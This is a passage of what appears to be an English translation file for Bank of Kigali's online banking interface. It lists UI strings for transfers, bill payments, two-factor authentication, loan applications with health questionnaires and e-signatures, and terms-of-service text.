"Definitions", "Your Responsibilities for Security": "Your Responsibilities for Security", "Access": "Access", "Checking your statements": "Checking your statements", "Other security safeguards": "Other security safeguards", "Appointment of authorized users": "Appointment of authorized users", "Transactional limits": "Transactional limits", "Dealings in foreign currency": "Dealings in foreign currency", "Telegraphic Transfers": "Telegraphic Transfers", "Acting on Customer Instructions": "Acting on Customer Instructions", "Instructions": "Instructions", "Operating Times, Changes and Disruptions": "Operating Times, Changes and Disruptions", "Intellectual property": "Intellectual property", "Fees, Commissions and Taxes": "Fees, Commissions and Taxes", "Instructions supplied": "Instructions supplied", "Liability": "Liability", "Anti-Money Laundering, Proceeds of Crime and Other Offences": "Anti-Money Laundering, Proceeds of Crime and Other Offences", "Disclosure of Certain Information": "Disclosure of Certain Information", "Notices": "Notices", "Advertising & Promotions": "Advertising & Promotions", "No waiver": "No waiver", "Amendment": "Amendment", "Severability": "Severability", "Governing Law": "Governing Law", "Disclaimer of Warranties": "Disclaimer of Warranties", "Change username": "Change username", "Welcome to our new internet banking 2.0. We kindly request you to select a different username as the one provided already exists in our records. Thank you for your cooperation.": "Welcome to our new internet banking 2.0. We kindly request you to select a different username as the one provided already exists in our records. Thank you for your cooperation.", "Welcome back": "Welcome back", "Current Account": "Current Account", "Savings Account": "Savings Account", "TRANSACTION ACCOUNTS": "TRANSACTION ACCOUNTS", "Favourite Billers": "Favourite Billers", "Add": "Add", "Your favourite billers will show up here": "Your favourite billers will show up here", "recent transactions": "recent transactions", "Print": "Print", "Start Date": "Start Date", "End Date": "End Date", "Your ministatement will show up here": "Your ministatement will show up here", "SCHEDULED ON": "SCHEDULED ON", "DEBIT ACCOUNT": "DEBIT ACCOUNT", "TYPE": "TYPE", "Schedule Payments": "Schedule Payments", "Your scheduled payments will be displayed here": "Your scheduled payments will be displayed here", "Payment Details": "Payment Details", "Bill Payment": "Bill Payment", "Bill Type": "Bill Type", "First payment Date": "First payment Date", "Last payment Date": "Last payment Date", "Next payment Date": "Next payment Date", "Download Receipt": "Download Receipt", "ACTION": "ACTION", "NOTIFICATION STATUS": "NOTIFICATION STATUS", "BANK STATUS": "BANK STATUS", "Debit Account Name": "Debit Account Name", "Token": "Token", "FAVOURITES": "FAVOURITES", "BENEFICIARIES": "BENEFICIARIES", "OTHER ": "OTHER ", "beneficiaries": "beneficiaries", "Your billers will show up here": "Your billers will show up here", "Your payment is in progress": "Your payment is in progress", "Biller Name": "Biller Name", "Search by biller name": "Search by biller name", "Add favourite biller": "Add favourite biller", "FAVOURITE BILLERS": "FAVOURITE BILLERS", "Manage": "Manage", "Your favorite billers will show up here": "Your favorite billers will show up here", "Agree and continue": "Agree and continue", "These terms and conditions shall apply with regards to the use of the Online": "These terms and conditions shall apply with regards to the use of the Online", "Banking service (hereinafter referred to as “the Service”) provided by Bank of Kigali Plc (hereinafter referred to as the “Bank”).": "Banking service (hereinafter referred to as “the Service”) provided by Bank of Kigali Plc (hereinafter referred to as the “Bank”).", "You are hereby requested to read and understand these Terms and Conditions before you subscribe to the use of the Service. By accepting these terms and conditions,": "You are hereby requested to read and understand these Terms and Conditions before you subscribe to the use of the Service. By accepting these terms and conditions,", "you acknowledge that you have read, understood and agree to be bound by them. Where any clarification is sort with regards to the interpretation and/or effect of these terms,": "you acknowledge that you have read, understood and agree to be bound by them. Where any clarification is sort with regards to the interpretation and/or effect of these terms,", "please contact the Bank directly through its countrywide branches or through the Contact Centre numbers availed in the Bank’s Website.": "please contact the Bank directly through its countrywide branches or through the Contact Centre numbers availed in the Bank’s Website.", "These Terms and Conditions shall be read in conjunction with the Account Opening Terms and Conditions. In the event of any conflict between the two, these Terms and Conditions shall prevail.": "These Terms and Conditions shall be read in conjunction with the Account Opening Terms and Conditions. In the event of any conflict between the two, these Terms and Conditions shall prevail.", "These terms and conditions shall apply with regards to the use of the Online Banking service (hereinafter referred to as “the Service”)": "These terms and conditions shall apply with regards to the use of the Online Banking service (hereinafter referred to as “the Service”)", "provided by Bank of Kigali Plc (hereinafter referred to as the “Bank”). You are hereby requested to read and understand these Terms and Conditions before you subscribe": "provided by Bank of Kigali Plc (hereinafter referred to as the “Bank”). You are hereby requested to read and understand these Terms and Conditions before you subscribe", "to the use of the Service. By accepting these terms and conditions, you acknowledge that you have read, understood and agree to be bound by them. Where any clarification is": "to the use of the Service. By accepting these terms and conditions, you acknowledge that you have read, understood and agree to be bound by them. Where any clarification is", "sort with regards to the interpretation and/or effect of these terms, please contact the Bank directly through its countrywide branches or through the Contact Centre numbers availed": "sort with regards to the interpretation and/or effect of these terms, please contact the Bank directly through its countrywide branches or through the Contact Centre numbers availed", "in the Bank’s Website.": "in the Bank’s Website.", "These Terms and Conditions shall be read in conjunction with the Account Opening Terms and Conditions.": "These Terms and Conditions shall be read in conjunction with the Account Opening Terms and Conditions.", "In the event of any conflict between the two, these Terms and Conditions shall prevail.": "In the event of any conflict between the two, these Terms and Conditions shall prevail.", "Introduction": "Introduction", "continue": "continue", "Privacy policy": "Privacy policy", "Non migrated customer": "Non migrated customer", "Username already taken, try another one": "Username already taken, try another one", "Use 2 factor authentication app": "Use 2 factor authentication app", "By enabling TOTP, it will disable phone and email OTP preference. Do you wish to continue?": "By enabling TOTP, it will disable phone and email OTP preference. Do you wish to continue?", "2 factor authentication": "2 factor authentication", "Open the Microsoft authentication app on your mobile device to link it to your internet banking": "Open the Microsoft authentication app on your mobile device to link it to your internet banking", "Scan QR Code": "Scan QR Code", "Enter this code in your authenticator app": "Enter this code in your authenticator app", "Enter the code from your Microsoft authentication app": "Enter the code from your Microsoft authentication app", "TOTP enabled successfully": "TOTP enabled successfully", "TOTP(Authenticator App)": "TOTP(Authenticator App)", "Use a Microsoft authentication app to get a verification code to login with": "Use a Microsoft authentication app to get a verification code to login with", "Enable 2 factor authentication. To disable, kindly enable sms or email below": "Enable 2 factor authentication. To disable, kindly enable sms or email below", "OTP Preference": "OTP Preference", "Set OTP preference to define where your OTP notifications will be sent": "Set OTP preference to define where your OTP notifications will be sent", "PHONE (SMS)": "PHONE (SMS)", "EMAIL": "EMAIL", "Access details": "Access details", "Get a quick access to your username and password information": "Get a quick access to your username and password information", "Update password": "Update password", "Password expiry date": "Password expiry date", "Profile": "Profile", "Logout": "Logout", "New password successfully set": "New password successfully set", "You can now use your new password on all BK channels to log into your account.": "You can now use your new password on all BK channels to log into your account.", "Confirm new password": "Confirm new password", "New password": "New password", "Change the password for your account": "Change the password for your account", "Change password": "Change password", "View terms and conditions": "View terms and conditions", "By accepting to enable email notification, you indemnify the bank against risks of phishing, email hacking, etc which may occur.": "By accepting to enable email notification, you indemnify the bank against risks of phishing, email hacking, etc which may occur.", "Email warning": "Email warning", "Dear": "Dear", "please ensure that your email is well protected to prevent unauthorized login and transfer via BK Internet banking": "please ensure that your email is well protected to prevent unauthorized login and transfer via BK Internet banking", "Password don’t match": "Password don’t match", "No matching account": "No matching account", "Search an account": "Search an account", "Enter the code that was sent to your phone number ": "Enter the code that was sent to your phone number", "From account": "From account", "To account": "To account", "Enter payment reference name, type": "Enter payment reference name, type", "Enter the code that was generated by authenticator application": "Enter the code that was generated by authenticator application", "Request Loan": "Request Loan", "Our loans": "Our loans", "INSTANT LOANS": "INSTANT LOANS", "BK QUICK": "BK QUICK", "BKQuick enables BK customers to borrow from their bank and acquire the loan amount instantly": "BKQuick enables BK customers to borrow from their bank and acquire the loan amount instantly", "Check eligibility": "Check eligibility", "Select account": "Select account", "BK Quick": "BK Quick", "BK Quick loan": "BK Quick loan", "Instant & Unsecured": "Instant & Unsecured", "Eligible": "Eligible", "Not Eligible": "Not Eligible", "Minimum limit": "Minimum limit", "Period": "Period", "Beneficiary account no./IBAN": "Beneficiary account no./IBAN", "Routing number (optional)": "Routing number (optional)", "Beneficiary address": "Beneficiary address", "Swift code": "Swift code", "Intermediary bank (optional)": "Intermediary bank (optional)", "Beneficiary bank name": "Beneficiary bank name", "Beneficiary bank address": "Beneficiary bank address", "Beneficiary bank country": "Beneficiary bank country", "Charges type": "Charges type", "Browse files": "Browse files", "Attach supporting documents (PNG, JPEG, PDF - 3 file(s) max, 2MB max per file)": "Attach supporting documents (PNG, JPEG, PDF - 3 file(s) max, 2MB max per file)", "Narration": "Narration", "Validate code": "Validate code", "UAE Purpose of payment": "UAE Purpose of payment", "Branch code": "Branch code", "Intermediary bank name": "Intermediary bank name", "Intermediary bank address": "Intermediary bank address", "Intermediary bank country": "Intermediary bank country", "Error attaching file(s)": "Error attaching file(s)", "Error fetching UAE purposes of payment": "Error fetching UAE purposes of payment", "Update beneficiary": "Update beneficiary", "No transfers between accounts allowed": "No transfers between accounts allowed", "Personal information": "Personal information", "Security & Login": "Security & Login", "Alert settings": "Alert settings", "City, country": "City, country", "Ours": "Ours", "Shared": "Shared", "Monthly payment": "Monthly payment", "There is a pending application found": "Your application is under processing", "Loan request submitted successfully": "Loan request submitted successfully", "All Loans": "All Loans", "Request Loans": "Request Loans", "Select an account for loan review, allocation, and manageable repayment tenure.": "Select an account for loan review, allocation, and manageable repayment tenure.", "Your account has been registered for BkQuick": "Your account has been registered for BkQuick", "Your account could not be registered for BkQuick": "Your account could not be registered for BkQuick", "BK Mastercard Debit Card": "BK Mastercard Debit Card", "PREPAID CARDS": "PREPAID CARDS", "Debit amount": "Debit amount", "Credit amount": "Credit amount", "Charges": "Charges", "Payment initiated on": "Payment initiated on", "Sender’s reference": "Sender’s reference", "Ordering customer": "Ordering customer", "Ordering institution": "Ordering institution", "Identifier code": "Identifier code", "Beneficiary customer": "Beneficiary customer", "Total charges": "Total charges", "Send money to an international account": "Send money to an international account", "Send money using Alipay transfer": "Send money using Alipay transfer", "Send and receive money between eKash accounts for free": "Send and receive money between eKash accounts for free", "Airtime": "Airtime", "Utility": "Utility", "Government": "Government", "TV": "TV", "Internet": "Internet", "Education": "Education", "Import & Export": "Import & Export", "MTN": "MTN", "Airtel": "Airtel", "Wasac": "Wasac", "Cash Power Electricity": "Cash Power Electricity", "Postpaid Electricity": "Postpaid Electricity", "RRA": "RRA", "Irembo": "Irembo", "RURA": "RURA", "Ejo Heza": "Ejo Heza", "Startimes": "Startimes", "Liquid Telecom": "Liquid Telecom", "Urubuto Schools": "Urubuto Schools", "NAEB": "NAEB", "Prepaid card payment": "Prepaid card payment", "BILL NUMBER": "BILL NUMBER", "Associated Name": "Associated Name", "METER NUMBER": "METER NUMBER", "Invoice reference/Customer ID": "Invoice reference/Customer ID", "DOCUMENT ID": "DOCUMENT ID", "Tax Payer Name": "Tax Payer Name", "Bill Id": "Bill Id", "National Id": "National Id", "CARD NUMBER": "CARD NUMBER", "Student Id": "Student Id", "Academic Term": "Academic Term", "Academic Year": "Academic Year", "School Name": "School Name", "Student Name": "Student Name", "Payment Purpose": "Payment Purpose", "Application Fee": "Application Fee", "Card Number": "Card Number", "Local Bank": "Local Bank", "BK TO MOMO": "BK TO MOMO", "BK TO AIRTEL MONEY": "BK TO AIRTEL MONEY", "Swift": "Swift", "ALIPAY": "ALIPAY", "Bank Name": "Bank Name", "Account Holder Name": "Account Holder Name", "Mobile Number": "Mobile Number", "Mobile Holder Name": "Mobile Holder Name", "Biller Id": "Biller Id", "account Name": "account Name", "SWIFT Code": "SWIFT Code", "Beneficiary Full Name": "Beneficiary Full Name", "Beneficiary Address": "Beneficiary Address", "Beneficiary Account Currency": "Beneficiary Account Currency", "Beneficiary Account Number": "Beneficiary Account Number", "Beneficiary Bank Name": "Beneficiary Bank Name", "Beneficiary Bank Country": "Beneficiary Bank Country", "Beneficiary Bank Address": "Beneficiary Bank Address", "Intermediary Bank": "Intermediary Bank", "First Name": "First Name", "Last Name": "Last Name", "ALIPAY customer Id": "ALIPAY customer Id", "Error loading exchange rate": "Error loading exchange rate", "The amount entered must not exceed the maximum limit": "The amount entered must not exceed the maximum limit", "You have been logged out due to inactivity": "You have been logged out due to inactivity", "Available balance": "Available balance", "Next payment due on": "Next payment due on", "Error attaching file: size limit exceeded": "Error attaching file: size limit exceeded", "Pending stage": "Pending stage", "Resource not found": "Resource not found", "Phone number not found": "Phone number not found", "Account number/IBAN": "Account number/IBAN", "Your account details": "Your account details", "We’ll use your account details to authenticate your access to BK Internet Banking": "We’ll use your account details to authenticate your access to BK Internet Banking", "This needs to be the same ID document you used for opening the account": "This needs to be the same ID document you used for opening the account", "ID number": "ID number", "Select ID type": "Select ID type", "Welcome": "Welcome", "We matched your credentials with the following details in our system:": "We matched your credentials with the following details in our system:", "Name": "Name", "Confirm details": "Confirm details", "Get started now": "Get started now", "I am a BK customer": "I am a BK customer", "I already have an account but would like online access": "I already have an account but would like online access", "Already have an account?": "Already have an account?", "Introduce yourself": "Introduce yourself", "You are required to fill in your personal details": "You are required to fill in your personal details", "Need help?": "Need help?", "Mobile verification": "Mobile verification", "Setup Safe Access": "Setup Safe Access", "Setup your security questions to help us verify you in the future": "Setup your security questions to help us verify you in the future", "Security Question 1": "Security Question 1", "Answer": "Answer", "Security Question 2": "Security Question 2", "Security Question 3": "Security Question 3", "Credentials saved successfully": "Credentials saved successfully", "BK Digital Access": "BK Digital Access", "Setup a new username and password for your account": "Setup a new username and password for your account", "Verification Successful": "Verification Successful", "You will be redirected to set your safe access": "You will be redirected to set your safe access", "Beneficiary address 2 (optional)": "Beneficiary address 2 (optional)", "Beneficiary address 2": "Beneficiary address 2", "Personal loan enables BK customers to borrow from their bank and acquire the loan amount instantly": "Personal loan enables BK customers to borrow from their bank and acquire the loan amount instantly", "Loan eligibility": "Loan eligibility", "Interest rates": "Interest rates", "Application process": "Application process", "Approval process": "Approval process", "Disbursement": "Disbursement", "Repayment": "Repayment", "Prepayment": "Prepayment", "Late payment charges": "Late payment charges", "Repayment channels": "Repayment channels", "Collateral": "Collateral", "Insurance": "Insurance", "Changes to terms": "Changes to terms", "Early settlement": "Early settlement", "Customer service": "Customer service", "Governing law": "Governing law", "Applicants must have Rwandan IDs and Foreigner IDs issued by NIDA.": "Applicants must have Rwandan IDs and Foreigner IDs issued by NIDA.", "Age requirement: 21 to 70 years.": "Age requirement: 21 to 70 years.", "Minimum monthly income of 500,000 RWF.": "Minimum monthly income of 500,000 RWF.", "Maximum loan amount: 30,000,000 RWF.": "Maximum loan amount: 30,000,000 RWF.", "Loan amount subject to applicant's repayment capacity.": "Loan amount subject to applicant's repayment capacity.", "Maximum loan tenure: 5 years.": "Maximum loan tenure: 5 years.", "Flexible repayment periods with monthly installments.": "Flexible repayment periods with monthly installments.", "Competitive interest rates based on the prevailing market conditions.": "Competitive interest rates based on the prevailing market conditions.", "Interest rates subject to periodic reviews.": "Interest rates subject to periodic reviews.", "Submit a completed loan application via Internet Banking Web.": "Submit a completed loan application via Internet Banking Web.", "Loan approval is subject to credit assessment and verification of Loan application.": "Loan approval is subject to credit assessment and verification of Loan application.", "Approval decision communicated within 3 working days.": "Approval decision communicated within 3 working days.", "Disbursement made directly to the borrower's Bank of Kigali account.": "Disbursement made directly to the borrower's Bank of Kigali account.", "Monthly installment payments via standing order or direct debit.": "Monthly installment payments via standing order or direct debit.", "Grace period for the first installment may be considered.": "Grace period for the first installment may be considered.", "Partial or full prepayment allowed without penalty.": "Partial or full prepayment allowed without penalty.", "Late payment charges may be applicable for overdue installments.": "Late payment charges may be applicable for overdue installments.", "Regular communication for any delayed payments is encouraged.": "Regular communication for any delayed payments is encouraged.", "Borrower may pay via Internet Banking Web, BK Mobile App, USSD (*334) or by depositing funds through tellers.": "Borrower may pay via Internet Banking Web, BK Mobile App, USSD (*334) or by depositing funds through tellers.", "Unsecured personal loan, no collateral required.": "Unsecured personal loan, no collateral required.", "Loan approval based on creditworthiness.": "Loan approval based on creditworthiness.", "Borrowers may be required to purchase credit life insurance.": "Borrowers may be required to purchase credit life insurance.", "Insurance premium added to the loan amount.": "Insurance premium added to the loan amount.", "Failure to meet repayment obligations may lead to legal action.": "Failure to meet repayment obligations may lead to legal action.", "Defaulting on the loan may impact credit history.": "Defaulting on the loan may impact credit history.", "The bank reserves the right to review and modify loan terms.": "The bank reserves the right to review and modify loan terms.", "Borrowers will be notified in advance of any changes.": "Borrowers will be notified in advance of any changes.", "Borrowers can settle the loan before the maturity date.": "Borrowers can settle the loan before the maturity date.", "Dedicated customer service for loan-related inquiries.": "Dedicated customer service for loan-related inquiries.", "Contact 4455 or visit the nearest branch.": "Contact 4455 or visit the nearest branch.", "The loan agreement is governed by Rwandan laws.": "The loan agreement is governed by Rwandan laws.", "Unsecured staff personal loan": "Unsecured staff personal loan", "Nearest branch": "Nearest branch", "Your loan limit": "Your loan limit", "Principal amount": "Principal amount", "Let’s get started": "Let’s get started", "To apply for this loan, you are required to meet all the requirements below": "To apply for this loan, you are required to meet all the requirements below", "Access to personal information": "Access to personal information", "How we use your data": "How we use your data", "Allow access": "Allow access", "Welcome to Bank of Kigali! At Bank of Kigali, we are committed to protecting your privacy and the security of your personal information. This Privacy Policy is designed to help you understand how we collect, use, and safeguard your data.": "Welcome to Bank of Kigali! At Bank of Kigali, we are committed to protecting your privacy and the security of your personal information. This Privacy Policy is designed to help you understand how we collect, use, and safeguard your data.", "Bank of Kigali places the highest importance on data security. We employ advanced security measures to protect your personal and financial information from unauthorized access, data breaches, and other security.": "Bank of Kigali places the highest importance on data security. We employ advanced security measures to protect your personal and financial information from unauthorized access, data breaches, and other security.", "Personal Information: We may collect personal information, such as your name, date of birth, address, email address, phone number, and other details when you open an account with us or use our services.": "Personal Information: We may collect personal information, such as your name, date of birth, address, email address, phone number, and other details when you open an account with us or use our services.", "Financial Information: To provide banking services, we collect financial information, including account numbers, transaction history, credit history, and other financial data.": "Financial Information: To provide banking services, we collect financial information, including account numbers, transaction history, credit history, and other financial data.", "We use your personal and financial information for the following purposes:": "We use your personal and financial information for the following purposes:", "Account Management: To administer your accounts, provide banking services, and ensure security.": "Account Management: To administer your accounts, provide banking services, and ensure security.", "Communication: To contact you with relevant information about your accounts, updates, and offers related to our services.": "Communication: To contact you with relevant information about your accounts, updates, and offers related to our services.", "Access to sensitive information": "Access to sensitive information", "The bank will utilize the collected data for your loan insurance cover application. The collected data will be deleted once the application is finalized (either rejected or approved).": "The bank will utilize the collected data for your loan insurance cover application. The collected data will be deleted once the application is finalized (either rejected or approved).", "Health questionnaire": "Health questionnaire", "Please fill out a health questionnaire to secure insurance for your loan.": "Please fill out a health questionnaire to secure insurance for your loan.", "Be truthful": "Be truthful", "Answer truthfully to help us find the right insurance for you.": "Answer truthfully to help us find the right insurance for you.", "Provide personal data": "Provide personal data", "The information you share here is personal, and we will treat it with utmost confidentiality.": "The information you share here is personal, and we will treat it with utmost confidentiality.", "Provide consent": "Provide consent", "By continuing, you are giving us consent to capture sensitive information from you.": "By continuing, you are giving us consent to capture sensitive information from you.", "The insurance questionnaire data will be deleted after the loan application process is done.": "The insurance questionnaire data will be deleted after the loan application process is done.", "Loan insurance cover": "Loan insurance cover", "Selection of the insurance provider will be made by one of our esteemed insurance partners": "Selection of the insurance provider will be made by one of our esteemed insurance partners", "Automatic deletion": "Automatic deletion", "Loan tenure cannot be greater than 60 months or 5 years!": "Loan tenure cannot be greater than 60 months or 5 years!", "Loan amount cannot be greater than your loan limit!": "Loan amount cannot be greater than your loan limit!", "Your loan application is being processed": "Your loan application is being processed", "Error initiating loan": "Error initiating loan", "UNSECURED LOANS": "UNSECURED LOANS", "Staff personal loan": "Staff personal loan", "Loan request": "Loan request", "Loan offer": "Loan offer", "Sign contract": "Sign contract", "Your request has been initiated": "Your request has been initiated", "Loan offer is being processed": "Loan offer is being processed", "Loan contract is being processed": "Loan contract is being processed", "Disbursement is being processed": "Disbursement is being processed", "Your loan is being processed": "Your loan is being processed", "You can use this loan id": "You can use this loan id", "to track your loan status with our customer service": "to track your loan status with our customer service", "View offer": "View offer", "Accept offer": "Accept offer", "Reject offer": "Reject offer", "Payment frequency": "Payment frequency", "Requested amount": "Requested amount", "Approved amount": "Approved amount", "Disbursement account": "Disbursement account", "Loan offer successfully accepted": "Loan offer successfully accepted", "Loan offer successfully rejected": "Loan offer successfully rejected", "Answer health questions": "Answer health questions", "Weight (KG)": "Weight (KG)", "Height (cm)": "Height (cm)", "Are you presently disabled": "Are you presently disabled", "Do you perform normal activities": "Do you perform normal activities", "Have you recently received treatments": "Have you recently received treatments", "Received treatments": "Received treatments", "Have you had any respiratory issues": "Have you had any respiratory issues", "Do you have asthma": "Do you have asthma", "Do you have tuberculosis": "Do you have tuberculosis", "Do you have paralysis epilepsy": "Do you have paralysis epilepsy", "Have you recently done hepatitis B test": "Have you recently done hepatitis B test", "Hepatitis B test date": "Hepatitis B test date", "Hepatitis B test result": "Hepatitis B test result", "Health questionnaire submitted successfully": "Health questionnaire submitted successfully", "Have you recently done HIV test": "Have you recently done HIV test", "HIV test date": "HIV test date", "HIV test result": "HIV test result", "Did you do surgery": "Did you do surgery", "Surgery date": "Surgery date", "Surgery reason": "Surgery reason", "Do you plan on having surgery": "Do you plan on having surgery", "Do you have a disability": "Do you have a disability", "Specified disability": "Specified disability", "Specify": "Specify", "Hepatitis C": "Hepatitis C", "Diabetes": "Diabetes", "Hypertension": "Hypertension", "Hypotension": "Hypotension", "Cancer": "Cancer", "Stroke": "Stroke", "Kidney disease": "Kidney disease", "Heart disease": "Heart disease", "Molar pregnancy (females only)": "Molar pregnancy (females only)", "Disc herniation of vertebral column": "Disc herniation of vertebral column", "Health questionnaire (1 of 3)": "Health questionnaire (1 of 3)", "Health questionnaire (2 of 3)": "Health questionnaire (2 of 3)", "Health questionnaire (3 of 3)": "Health questionnaire (3 of 3)", "Sign contracts": "Sign contracts", "Create signature": "Create signature", "Select a device you want to use to create your signature": "Select a device you want to use to create your signature", "Provide a signature": "Provide a signature", "Sign to agree or consent to the application for a loan": "Sign to agree or consent to the application for a loan", "Sign the loan contract": "Sign the loan contract", "You will need to sign in a signature box to proceed": "You will need to sign in a signature box to proceed", "Sign the insurance contract": "Sign the insurance contract", "Use channel to sign": "Use channel to sign", "Use your mobile to create a signature (Recommended)": "Use your mobile to create a signature (Recommended)", "Upload from device": "Upload from device", "Use your laptop to create a signature": "Use your laptop to create a signature", "Clear": "Clear", "Submit": "Submit", "Sign for consent": "Sign for consent", "Sign in the box and then click “Save” to proceed": "Sign in the box and then click “Save” to proceed", "Upload signature": "Upload signature", "Provide a signature specimen to proceed with loan request": "Provide a signature specimen to proceed with loan request", "Upload image": "Upload image", "Loan contract": "Loan contract", "Insurance contract": "Insurance contract", "Sign": "Sign", "Loan contract to be signed": "Loan contract to be signed", "Insurance contract to be signed": "Insurance contract to be signed", "Drag and drop your signature image here": "Drag and drop your signature image here", "Error fetching loan data": "Error fetching loan data", "Get started": "Get started", "Here are some of the requirements you should provide": "Here are some of the requirements you should provide", "Provide loan amount": "Provide loan amount", "Answer truthfully to help us find the right insurance for you. This will ensure that the loan provided encompassed all aspects.": "Answer truthfully to help us find the right insurance for you. This will ensure that the loan provided encompassed all aspects.", "Select nearest BK Branch": "Select nearest BK Branch", "View loan offer": "View loan offer", "Accept loan offer": "Accept loan offer", "Sensitive health data collection": "Sensitive health data collection", "Selection of the insurance provider will be made by one of our esteemed insurance partners.": "Selection of the insurance provider will be made by one of our esteemed insurance partners.", "By consenting, you agree to the following": "By consenting, you agree to the following", "Submit E-Signature": "Submit E-Signature", "Yes, I consent": "Yes, I consent", "Select the contract you want to sign for": "Select the contract you want to sign for", "Error downloading contract": "Error downloading contract", "Signature submitted successfully": "Signature submitted successfully", "Required": "Required", "Loan top up": "Loan top up", "Processing...": "Processing...", "Something went wrong, please try again!": "Something went wrong, please try again!", "You have no RSSB number associated with your customer profile.": "You have no RSSB number associated with your customer profile.", "Kindly provide it. Should you not have it, follow the link below to give your RSSB consent and come back here to enter it.": "Kindly provide it. Should you not have it, follow the link below to give your RSSB consent and come back here to enter it.", "Provide additional documents": "Provide additional documents", "RSSB number": "RSSB number", "Unsecured personal loan": "Unsecured personal loan", "Additional documents": "Additional documents", "PNG, JPEG, PDF - 1 file max, 2MB": "PNG, JPEG, PDF - 1 file max, 2MB", "Error submitting documents": "Error submitting documents", "Stage": "Stage", "Upload additional documents": "Upload additional documents", "Personal loan": "Personal loan", "INVALID_OTP_CODE": "Invalid OTP code", "Downloading": "Downloading", "Next: Sign insurance contract": "Next: Sign insurance contract", "Upload signature from your device": "Upload signature from your device", "Contract signed": "Contract signed", "Back": "Back", "You have already done this process, for more assistance you can call our customer support": "You have already done this process, for more assistance you can call our customer support", "Please provide the additional requested documents to speed up the loan approval process": "Please provide the additional requested documents to speed up the loan approval process", "Loan request form": "Loan request form", "month(s)": "month(s)", "year(s)": "year(s)", "Loans history": "Loans history", "Your loans history will be displayed here": "Your loans history will be displayed here", "Loan ID": "Loan ID", "Amount requested": "Amount requested", "Loan request details": "Loan request details", "Loan contracts": "Loan contracts", "You will be asked to enter the loan amount you need.": "You will be asked to enter the loan amount you need.", "As an outcome your loan request analysis, we will send you a loan offer .": "As an outcome your loan request analysis, we will send you a loan offer .", "You'll complete a health questionnaire to select suitable insurance for your loan.": "You'll complete a health questionnaire to select suitable insurance for your loan.", "You will need to agree to the application of account opening by providing your signature.": "You will need to agree to the application of account opening by providing your signature.", "Loan Benefits": "Loan Benefits", "Requirements": "Requirements", "You are going to provide personal data through RSSB portal to give us consent": "You are going to provide personal data through RSSB portal to give us consent", "Please check if the details you provided are correct": "Please check if the details you provided are correct", "Personal details": "Personal details", "Additional information": "Additional information", "Estimated eligible amount": "Estimated eligible amount", "Salary Assignment from Employer on prescribed Bk Plc Form": "Salary Assignment from Employer on prescribed Bk Plc Form", "Commitment letter": "Commitment letter", "Spouse consent": "Spouse consent", "Work permit, Foreigner’s ID, Employer Guarantee (if applicable)": "Work permit, Foreigner’s ID, Employer Guarantee (if applicable)", "For foreigners: Valid passport": "For foreigners: Valid passport", "Enter your RSSB number": "Enter your RSSB number", "Loans History": "Loans History", "Your loans will be displayed here": "Your loans will be displayed here", "Save number": "Save number", "Please enter your RSSB number to proceed": "Please enter your RSSB number to proceed", "Amount you receive": "Amount you receive", "Total amount to repay": "Total amount to repay", "Repayment amount per month": "Repayment amount per month", "First repayment due date": "First repayment due date", "Estimated first repayment due date": "Estimated first repayment due date", "Application fees": "Application fees", "Facility fees": "Facility fees", "Management fees": "Management fees", "Annual percentage rate (%)": "Annual percentage rate (%)", "Total fees and charges": "Total fees and charges", "Base rate (%)": "Base rate (%)", "Error saving RSSB number": "Error saving RSSB number", "Sign insurance contract": "Sign insurance contract", "ID type": "ID type", "Monthly salary": "Monthly salary", "Non-performing accounts/My sector": "Non-performing accounts/My sector", "Non-performing accounts/Other sectors": "Non-performing accounts/Other sectors", "Bounced cheques": "Bounced cheques", "Identification details": "Identification details", "Employment status": "Employment status", "CRB assessment": "CRB assessment", "Retry CRB": "Retry CRB", "Interest rate (default)": "Interest rate (default)", "Application fee": "Application fee", "Processing time": "Processing time", "Customer consent": "Customer consent", "Please be advised that a charge of RWF 17,405 will be applied to your account. If there are insufficient funds, your loan request will not be processed": "Please be advised that a charge of RWF 17,405 will be applied to your account. If there are insufficient funds, your loan request will not be processed", "ID not found in RSSB": "ID not found in RSSB", "Allow": "Allow", "Onafriq": "Onafriq", "Country": "Country", "Recipient country": "Recipient country", "Recipient ID": "Recipient ID", "A/C holder first name": "A/C holder first name", "A/C holder last name": "A/C holder last name", "ONAFRIQ": "ONAFRIQ", "No banks found!": "No banks found!", "BK Remit": "BK Remit", "Call to RSSB failed! Try again in a moment!": "Call to RSSB failed! Try again in a moment!", "We do not have your consent to access personal information, you can give us access through RSSB.": "We do not have your consent to access personal information, you can give us access through RSSB.", "RSSB Consent": "RSSB Consent", "Kindly re-initiate saving the RSSB number once you have given your consent": "Kindly re-initiate saving the RSSB number once you have given your consent", "RSSB number mismatch with legal document": "RSSB number mismatch with legal document", "Failed to verify RSSB consent! Ensure you have given consent on RSSB and try again in a moment": "Failed to verify RSSB consent! Ensure you have given consent on RSSB and try again in a moment", "Call to RSSB failed! Try again in a moment": "Call to RSSB failed! Try again in a moment", "Loan analysis": "Loan analysis", "Loan insurance": "Loan insurance", "Loan review and analysis": "Loan review and analysis", "Loan offer accepted successfully": "Loan offer accepted successfully", "Loan insurance processed successfully": "Loan insurance processed successfully", "Please view and sign loan contract": "Please view and sign loan contract", "After signing, the disbursement will be processed": "After signing, the disbursement will be processed", "Less than 72 hours": "Less than 72 hours", "Print KFS": "Print KFS", "Key Factor Statement": "Key Factor Statement", "Schedule payment": "Schedule payment", "Pay with BK Pay": "Pay with BK Pay", "Reload salary": "Reload salary", "Please be advised that a charge of": "Please be advised that a charge of", "will be applied to your account. If there are insufficient funds, your loan request will not be processed": "will be applied to your account. If there are insufficient funds, your loan request will not be processed", "They receive": "They receive", "Fees charges (4% of the total amount)": "Fees charges (4% of the total amount)", "This is a computer generated key factor statement from the Bank of Kigali. It has been digitally signed.": "This is a computer generated key factor statement from the Bank of Kigali. It has been digitally signed.", "You currently have insufficient funds to process the application fees. Please top up your account and try again.": "You currently have insufficient funds to process the application fees. Please top up your account and try again.", "BK Pay": "BK Pay", "Notifications": "Notifications", "Search notifications": "Search notifications", "Got it": "Got it", "Yesterday": "Yesterday", "No notifications": "No notifications", "No matching notifications": "No matching notifications", "Your notifications will show up here": "Your notifications will show up here", "Card repayment": "Card repayment", "Ledger balance": "Ledger balance", "Savings": "Savings", "You will manage your savings here": "You will manage your savings here", "Build a secure financial future with our range of savings accounts": "Build a secure financial future with our range of savings accounts", "Interest calculator": "Interest calculator", "Open new account": "Open new account", "No savings account": "No savings account", "Top up account": "Top up account", "Savings tracker": "Savings tracker", "Save information": "Save information", "Minimum amount": "Minimum amount", "None": "None", "Features and Benefits": "Features and Benefits", "Less than 5min": "Less than 5min", "Monthly fee": "Monthly fee", 